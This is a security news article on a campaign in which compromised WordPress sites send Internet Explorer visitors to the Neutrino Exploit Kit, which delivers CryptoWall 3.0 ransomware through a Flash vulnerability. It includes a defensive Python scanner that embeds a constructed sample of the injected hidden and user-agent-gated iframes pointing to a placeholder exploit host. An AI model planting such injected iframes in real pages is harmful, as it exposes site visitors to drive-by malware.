WordPress sites redirect to Neutrino EK, CryptoWall pushed via Flash exploit

Neutrino Exploit Kit has been observed targeting CVE-2015-5119, an Adobe Flash Player zero-day vulnerability.

Zscaler has identified a campaign involving compromised WordPress websites redirecting visitors to the Neutrino Exploit Kit, which then serves up CryptoWall 3.0 ransomware by means of a recently patched Adobe Flash Player vulnerability.

The security firm has observed attackers targeting WordPress sites running version 4.2 and lower; as of a Thursday post, researchers had observed 2,600 unique WordPress websites being used in the operation.

Deepen Desai, director of security research with Zscaler, told SCMagazine.com in a Friday email correspondence that this appears to be an automated attack on WordPress sites.

“We haven't confirmed this yet, but it appears to be a combination of JetPack plugin (installed by default in those versions) Cross Site Scripting and CForms plugin 14.7 and an earlier arbitrary code execution vulnerability – CVE-2014-9473,” Desai said.

The attackers are fully compromising the WordPress sites, meaning they add a webshell and steal credentials before injecting the iFrame that loads the Neutrino Exploit Kit landing page, the post said, adding that the code only targets Internet Explorer users.
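The injection step described above leaves a recognisable footprint in the served HTML: an off-site iframe that is sized to one pixel or hidden with CSS, or a script that only writes such an iframe when the user agent looks like Internet Explorer. The following scanner is an added example written for this article, not code from Zscaler or SC Magazine; the hostnames in the embedded sample page are constructed placeholders on the reserved `.invalid` domain, and the heuristics (tiny dimensions, `display:none`, user-agent gating) are assumptions about what an operator reviewing a compromised site would want flagged.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample page (hypothetical hosts on the reserved .invalid TLD):
# one legitimate same-origin embed, one injected hidden off-site iframe, and
# one inline script that writes an iframe only for Internet Explorer user agents.
SAMPLE_HTML = """<html><body>
<h1>Blog</h1>
<iframe src="https://example-blog.invalid/embed/video" width="640" height="360"></iframe>
<iframe src="http://landing.example-ek.invalid/path" width="1" height="1" style="display:none"></iframe>
<script>
if (navigator.userAgent.indexOf("MSIE") !== -1) {
  document.write('<iframe src="http://landing.example-ek.invalid/ie" width="0" height="0"></iframe>');
}
</script>
</body></html>"""


class PageCollector(HTMLParser):
    """Collect every <iframe> start tag's attributes and every inline <script> body."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        tag = tag.lower()
        if tag == "iframe":
            # Boolean attributes arrive with value None; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})
        elif tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered as data, possibly in several chunks.
        if self._in_script and self.scripts:
            self.scripts[-1] += data


def _is_tiny(value):
    """True for width/height attributes of 0 or 1 (pixels or unitless)."""
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def is_hidden(attrs):
    """Heuristic: one-pixel frames or inline CSS that hides the element."""
    style = attrs.get("style", "").replace(" ", "").lower()
    if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
        return True
    return "display:none" in style or "visibility:hidden" in style


def is_offsite(src, site_host):
    """True when the iframe source points outside the site's own host or its subdomains."""
    host = (urlparse(src).hostname or "").lower()
    site_host = site_host.lower()
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def _parse(html):
    collector = PageCollector()
    collector.feed(html)
    collector.close()
    return collector


def find_suspicious_iframes(html, site_host):
    """Return the src of every iframe that is both off-site and hidden."""
    page = _parse(html)
    return [f["src"] for f in page.iframes
            if is_offsite(f.get("src", ""), site_host) and is_hidden(f)]


# Scripts that both inspect the user agent and emit an iframe are worth a look:
# the campaign's injected code only fired for Internet Explorer visitors.
UA_GATE = re.compile(r"navigator\.userAgent|\bMSIE\b|\bTrident\b")
IFRAME_WRITER = re.compile(r"document\.write\s*\(|<iframe", re.I)


def find_ua_gated_scripts(html):
    """Return inline script bodies that gate an iframe write on the user agent."""
    page = _parse(html)
    return [s for s in page.scripts if UA_GATE.search(s) and IFRAME_WRITER.search(s)]


if __name__ == "__main__":
    for src in find_suspicious_iframes(SAMPLE_HTML, "example-blog.invalid"):
        print("hidden off-site iframe:", src)
    for body in find_ua_gated_scripts(SAMPLE_HTML):
        print("user-agent gated script:", body.strip().splitlines()[0])
```

Run it against a page fetched from the site itself (with the site's own hostname as `site_host`) and also against the same URL fetched with an Internet Explorer user agent, since server-side injection may only appear for the targeted browser; a hit on either check is a cue to inspect the theme and plugin files, and the post's point that a webshell was planted first means cleaning the page alone is not sufficient.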

Neutrino Exploit Kit has been observed targeting CVE-2015-5119, an Adobe Flash Player vulnerability in the ActionScript3 ByteArray class. The flaw was identified as a zero-day bug in the Hacking Team leak and was quickly added into a variety of exploit kits.

“Successful exploitation of a victim leads to an encrypted executable download,” the post said. “The binary is decrypted and begins beaconing almost immediately. Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple minutes later we see the all too familiar 'HELP_DECRYPT' page and see connections out to the payment servers.”
